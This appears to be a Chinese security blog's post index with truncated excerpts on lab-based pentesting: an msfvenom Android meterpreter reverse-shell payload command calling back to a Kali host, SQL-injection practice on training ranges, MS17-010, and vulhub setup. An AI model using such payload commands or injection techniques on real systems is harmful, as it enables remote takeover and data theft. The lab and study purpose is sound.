摘要: 首先将kali的网卡调节为桥接模式,使其与物理机可以ping通,在物理机开启一个安卓模拟器。 kali:10.115.28.98 命令: msfvenom -p android/meterpreter/reverse_tcp lhost=10.115.28.98 lport=5555 R>/home 阅读全文
posted @ 2020-10-29 16:08 陈子硕 阅读(1172) 评论(0) 推荐(0) 编辑
摘要: 恢复内容开始 最近闲来无事,发现一个在线靶场--墨者学院,本次实战就以此为平台,正好利用sqlmap跑一下,熟悉一下。 路径:墨者学院-->在线靶场-->web安全-->sql注入-->sql注入实战--MySQL URL:http://219.153.49.228:48368/show.php?i 阅读全文
posted @ 2020-07-07 23:14 陈子硕 阅读(585) 评论(0) 推荐(0) 编辑
摘要: MS17-010远程溢出漏洞(CVE-2017-0143) 描述 继2016年 8 月份黑客组织 Shadow Brokers 放出第一批 NSA “方程式小组”内部黑客工具后,2017 年 4 月 14 日,Shadow Brokers 再次公布了一批新的 NSA 黑客工具,其中包含了一个攻击框架 阅读全文
posted @ 2020-05-15 19:51 陈子硕 阅读(3327) 评论(0) 推荐(0) 编辑
摘要: 首先还是写一下核心的语句吧。 information_schemaschemata(schema_name)tables(table_schema,table_name)columns(table_schema,table_name,column_name) select schema_name f 阅读全文
posted @ 2020-05-06 13:14 陈子硕 阅读(8221) 评论(1) 推荐(1) 编辑
摘要: 今天在kali上搭建了vulhub环境,遇到了很多坑,没有写搭建环境的博客,不过都能百度解决。在此记录一下如何使用。 sudo service docker start 启动docker服务 cd ls 命令进入目标文件下(本次实例:vulhub/activemq/cve-2016-3088/) 运 阅读全文
posted @ 2020-04-30 17:04 陈子硕 阅读(1835) 评论(0) 推荐(0) 编辑
摘要: 知识铺垫 在上一篇中我们在漏洞页面中进行了SQL注入实战之联合查询,这篇文章带来的是SQL注入之报错注入篇。 首先我们来细分一下SQL注入分类SQL注入分类: 回显正常 > 联合查询 union select 回显报错 > Duplicate entry() extractvalue() updat 阅读全文
posted @ 2020-04-30 02:00 陈子硕 阅读(33250) 评论(1) 推荐(6) 编辑
摘要: 环境搭建 这里使用的windows2003+phpstudy2018+sdy1.5 我们解压sdy1.5至phpstudy下WWW文件内,在浏览器中输入127.0.0.1/sdy1.5进行安装 一路通过即可,我就不再赘述。 至此安装成功界面如下,下面我们就进入紧张刺激的实战演练环节喽。 SQL注入环 阅读全文
posted @ 2020-04-28 20:02 陈子硕 阅读(2110) 评论(1) 推荐(0) 编辑
摘要: Apache日志分析 想要知道什么人在什么时候浏览了网站的哪些内容吗?查看Apache的访问日志就可以知道。访问日志是Apache的标准日志,本文详细解释了访问日志的内容以及相关选项的配置。 一、web日志分析原理 web服务器日志记录了web服务器接受处理请求及运行时错误等各种原始信息。通过对日志 阅读全文
posted @ 2020-04-22 17:34 陈子硕 阅读(469) 评论(0) 推荐(0) 编辑
摘要: 下载链接 链接:https://pan.baidu.com/s/1jSmzcWeJh3Z4wbq7wnBwzQ 提取码:ggk2 ①安装nvcat 点击.exe文件进行安装,选择注册,将key.txt文件中的注册码放入即可。 ②远程登录mysql数据库 ③文件→新建连接,填写需要远程登录的信息 ④点 阅读全文
posted @ 2020-04-22 14:09 陈子硕 阅读(350) 评论(0) 推荐(0) 编辑
摘要: 文末贴上下载地址 我们来记录一下复活乌云(wooyun)的全过程,作为当年中国最火爆的漏洞库平台。 ①下载文件 ②通过VM打开文件中的.vmx文件 用户名/密码:hancool/qwe123 自行重启虚拟机 并且与主机通信。 ③因为本人的习惯所以用xshell登录。 路径 wooyun_public 阅读全文
posted @ 2020-04-21 22:26 陈子硕 阅读(2271) 评论(1) 推荐(0) 编辑